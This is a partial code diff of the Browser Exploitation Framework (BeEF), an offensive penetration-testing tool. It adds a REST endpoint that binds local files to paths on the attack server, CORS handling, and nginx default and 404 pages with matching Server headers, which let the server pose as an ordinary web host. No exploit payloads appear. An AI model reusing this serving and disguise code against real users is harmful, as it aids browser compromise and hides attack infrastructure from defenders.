core/main/network_stack/handlers/dynamicreconstruction.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/network_stack/handlers/raw.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/network_stack/handlers/redirector.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

8
core/main/network_stack/websocket/websocket.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -94,7 +94,7 @@ module BeEF
# execute(msg_hash)
# end
# }
# rescue Exception => e
# rescue => e
# print_error "WebSocket-secured error: #{e}"
# end
# end
@@ -150,7 +150,7 @@ module BeEF
# execute(msg_hash)
# end
# }
# rescue Exception => e
# rescue => e
# print_error "WebSocket error: #{e}"
# end
# end
@@ -203,7 +203,7 @@ module BeEF
execute(msg_hash)
end
}
rescue Exception => e
rescue => e
print_error "WebSocket error: #{e}"
end
end

9
core/main/rest/api.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -37,12 +37,19 @@ module BeEF
end
end
module RegisterServerHandler
def self.mount_handler(server)
server.mount('/api/server', BeEF::Core::Rest::Server.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterServerHandler, BeEF::API::Server, 'mount_handler')
#
# Check the source IP is within the permitted subnet

4
core/main/rest/handlers/admin.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -52,7 +52,7 @@ module BeEF
"token" => "#{config.get('beef.api_token')}"
}.to_json
end
rescue Exception => e
rescue => e
error 400
end
end

2
core/main/rest/handlers/categories.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/rest/handlers/hookedbrowsers.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/rest/handlers/logs.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

8
core/main/rest/handlers/modules.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -149,7 +149,7 @@ module BeEF
data.each{|k,v| options.push({'name' => k, 'value' => v})}
exec_results = BeEF::Module.execute(modk, params[:session], options)
exec_results != nil ? '{"success":"true","command_id":"'+exec_results.to_s+'"}' : '{"success":"false"}'
rescue Exception => e
rescue => e
print_error "Invalid JSON input for module '#{params[:mod_id]}'"
error 400 # Bad Request
end
@@ -203,7 +203,7 @@ module BeEF
end
end
results.to_json
rescue Exception => e
rescue => e
print_error "Invalid JSON input passed to endpoint /api/modules/multi"
error 400 # Bad Request
end
@@ -265,7 +265,7 @@ module BeEF
}
end
results.to_json
rescue Exception => e
rescue => e
print_error "Invalid JSON input passed to endpoint /api/modules/multi"
error 400 # Bad Request
end

41
core/main/rest/handlers/server.rb Normal file
View File

@@ -0,0 +1,41 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Rest
class Server < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
http_server = BeEF::Core::Server.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Binds a local file to a specified path in BeEF's web server
post '/bind' do
request.body.rewind
begin
data = JSON.parse request.body.read
mount = data['mount']
local_file = data['local_file']
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(local_file, mount)
status 200
rescue => e
error 400
end
end
end
end
end
end

2
core/main/router/api.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

67
core/main/router/router.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -66,6 +66,15 @@ module BeEF
"and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>" +
"</ul>" +
"</TD></TR></TABLE></BODY></HTML>"
when "nginx"
#response body
"<html>\n"+
"<head><title>404 Not Found</title></head>\n" +
"<body bgcolor=\"white\">\n" +
"<center><h1>404 Not Found</h1></center>\n" +
"<hr><center>nginx</center>\n" +
"</body>\n" +
"</html>\n"
else
"Not Found."
end
@@ -81,21 +90,43 @@ module BeEF
case type
when "apache"
headers "Server" => "Apache/2.2.3 (CentOS)",
"Content-Type" => "text/html"
"Content-Type" => "text/html; charset=UTF-8"
when "iis"
headers "Server" => "Microsoft-IIS/6.0",
"X-Powered-By" => "ASP.NET",
"Content-Type" => "text/html; charset=UTF-8"
when "nginx"
headers "Server" => "nginx",
"Content-Type" => "text/html"
else
print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
print_error "You have an error in beef.http.web_server_imitation.type! Supported values are: apache, iis, nginx."
end
end
# @note If CORS is enabled, expose the appropriate headers
# this apparently duplicate code is needed to reply to preflight OPTIONS requests, which need to respond with a 200
# and be able to handle requests with a JSON content-type
if request.request_method == 'OPTIONS' && config.get("beef.http.restful_api.allow_cors")
allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
headers "Access-Control-Allow-Origin" => allowed_domains,
"Access-Control-Allow-Methods" => "POST, GET",
"Access-Control-Allow-Headers" => "Content-Type"
halt 200
end
# @note If CORS is enabled, expose the appropriate headers
if config.get("beef.http.restful_api.allow_cors")
allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
headers "Access-Control-Allow-Origin" => allowed_domains,
"Access-Control-Allow-Methods" => "POST, GET"
end
end
# @note Default root page
get "/" do
if config.get("beef.http.web_server_imitation.enable")
bp = config.get "beef.http.web_ui_basepath"
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
@@ -191,7 +222,7 @@ module BeEF
"<h2>If you are the website administrator:</h2>" +
"<p>You may now add content to the directory <tt>/var/www/html/</tt>. Note that until you do so, people visiting your website will see this page and not your content. To prevent this page from ever being used, follow the instructions in the file <tt>/etc/httpd/conf.d/welcome.conf</tt>.</p>" +
"<p>You are free to use the images below on Apache and CentOS Linux powered HTTP servers. Thanks for using Apache and CentOS!</p>" +
"<p><a href=\"http://httpd.apache.org/\"><img src=\"/ui/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"/ui/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
"<p><a href=\"http://httpd.apache.org/\"><img src=\"#{bp}/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"#{bp}/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
"</div>" +
"</div>" +
"</div>" +
@@ -216,7 +247,7 @@ module BeEF
"<table>" +
"<tr>" +
"<td ID=tableProps width=70 valign=top align=center>" +
"<img ID=pagerrorImg src=\"/ui/media/images/icons/pagerror.gif\" width=36 height=48>" +
"<img ID=pagerrorImg src=\"#{bp}/media/images/icons/pagerror.gif\" width=36 height=48>" +
"<td ID=tablePropsWidth width=400>" +
"<h1 ID=errortype style=\"font:14pt/16pt verdana; color:#4e4e4e\">" +
"<P ID=Comment1><!--Problem--><P ID=\"errorText\">Under Construction</h1>" +
@@ -236,6 +267,30 @@ module BeEF
"</table>" +
"</body>" +
"</html>"
when "nginx"
"<!DOCTYPE html>\n" +
"<html>\n" +
"<head>\n" +
"<title>Welcome to nginx!</title>\n" +
"<style>\n" +
" body {\n" +
" width: 35em;\n" +
" margin: 0 auto;\n" +
" font-family: Tahoma, Verdana, Arial, sans-serif;\n" +
" }\n" +
"</style>\n" +
"</head>\n" +
"<body>\n" +
"<h1>Welcome to nginx!</h1>\n" +
"<p>If you see this page, the nginx web server is successfully installed and\n" +
"working. Further configuration is required.</p>\n\n" +
"<p>For online documentation and support please refer to\n" +
"<a href=\"http://nginx.org/\">nginx.org</a>.<br/>\n" +
"Commercial support is available at\n" +
"<a href=\"http://nginx.com/\">nginx.com</a>.</p>\n\n" +
"<p><em>Thank you for using nginx.</em></p>\n" +
"</body>\n" +
"</html>\n"
else
""
end
@@ -245,4 +300,4 @@ module BeEF
end
end
end
end
end

Some files were not shown because too many files have changed in this diff Show More